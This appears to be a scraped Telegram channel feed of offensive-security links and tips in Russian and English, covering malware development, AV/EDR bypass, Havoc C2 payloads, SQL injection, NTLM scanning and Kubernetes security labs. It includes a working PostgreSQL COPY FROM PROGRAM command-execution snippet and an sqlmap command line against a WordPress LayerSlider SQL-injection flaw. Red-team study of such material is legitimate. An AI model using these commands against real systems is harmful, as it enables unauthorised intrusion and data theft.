malware development useful links
The post will be updated
#maldev
BypassAV - Repo with the essential techniques to bypass antivirus and EDR
Bypass AV (practical examples) - useful examples & links
shellcode-fluctuation - article
executing the payload in memory - article
maldev-for-dummies - A workshop about Malware Development
The post will be updated
#maldev
Advanced sql injection techniques
Advanced SQL Injection Cheatsheet
SQL Injection Knowledge Base
sqlwiki
Advanced SQL Injection Cheatsheet
SQL Injection Knowledge Base
sqlwiki
Forwarded from xclip
Статьи по созданию кастомных нагрузов для Havoc C2
- https://notateamserver.xyz/havoc-implant/
- https://codex-7.gitbook.io/codexs-terminal-window/red-team/red-team-dev/extending-havoc-c2/third-party-agents
- https://payloads.online/archivers/2023/10/12/fda899c9-47ea-40e6-b6fc-a00600ccc9cb
#malware #redteam
- https://notateamserver.xyz/havoc-implant/
- https://codex-7.gitbook.io/codexs-terminal-window/red-team/red-team-dev/extending-havoc-c2/third-party-agents
- https://payloads.online/archivers/2023/10/12/fda899c9-47ea-40e6-b6fc-a00600ccc9cb
#malware #redteam
Forwarded from Offensive Xwitter
😈 [ MDSec @MDSecLabs ]
Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"
🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/
🐥 [ tweet ]
Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"
🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/
🐥 [ tweet ]
ntlm directories scanner - utility for searching directories that accept ntlm in services such as
* OWA servers
* Skype for Business/Lync servers
* Autodiscover servers (autodiscover.domain.com and lyncdiscover.domain.com)
* ADFS servers
GitHub
GitHub - nyxgeek/ntlmscan: scan for NTLM directories
scan for NTLM directories. Contribute to nyxgeek/ntlmscan development by creating an account on GitHub.
🐳1
Forwarded from Внутрянка
Материал про пентест 1С
Ardent101
Еще 1 раз про пентест 1С
Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…
Продолжу рассуждение…
Для любителей All-in-one
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.
Совершает такие проверки, как
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.
Совершает такие проверки, как
* IP Info
* Server Info
* DNS Records
* Email Configuration
* Open Ports
etc
Kubernetes Goat - Учебная платформа с лабами и материалами по безопасности куба
#kubernetes
* Learning Kubernetes
* OWASP Kubernetes Top 10
* MITRE for kube
* Lab’s scenarios
#kubernetes
Madhuakula
Welcome to Kubernetes Goat | Kubernetes Goat
Interactive Kubernetes Security Learning Playground
RCE in postgres
Автоматизация - Link
(Закомментить
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
Автоматизация - Link
(Закомментить
checkVersion(connection))Exploit Database
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated). CVE-2019–9193 . remote exploit for Multiple platform
Forwarded from Омский багхантер
Самый быстрый способ получить список всех путей веб-приложения на Next.js:
console.log(__BUILD_MANIFEST.sortedPages)
Forwarded from k8s (in)security (r0binak)
Исследователи из
По сути, инструмент сочетает в себе функционал
Более подробно о самом инструменте и мотивации его создания можно почитать в статье NamespaceHound: protecting multi-tenant K8s clusters.
WIZ опубликовали OpenSource инструмент NamespaceHound, который позволит найти вектора повышения привилегий в Kubernetes кластерах, где мультитенантность организована на уровне namespaces.По сути, инструмент сочетает в себе функционал
RBAC анализатора и PolicyEngine – он ищет возможные опасные права в кластере, а также избыточно привилегированные и опасные контейнеры (BadPods), с помощью которых потенциальный злоумышленник может нанести существенный импакт кластеру. Сейчас их внутренняя библиотека насчитывает 21 правило.Более подробно о самом инструменте и мотивации его создания можно почитать в статье NamespaceHound: protecting multi-tenant K8s clusters.
Forwarded from Proxy Bar
CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
#wordpress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:
sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T#wordpress
Forwarded from Threat Hunt
#maldev #redteam
Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.
1. Собираем проект
2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса:
https://github.com/Helixo32/CrimsonEDR
Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.
1. Собираем проект
./compile.sh2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234https://github.com/Helixo32/CrimsonEDR
GitHub
GitHub - Helixo32/CrimsonEDR: Simulate the behavior of AV/EDR for malware development training.
Simulate the behavior of AV/EDR for malware development training. - Helixo32/CrimsonEDR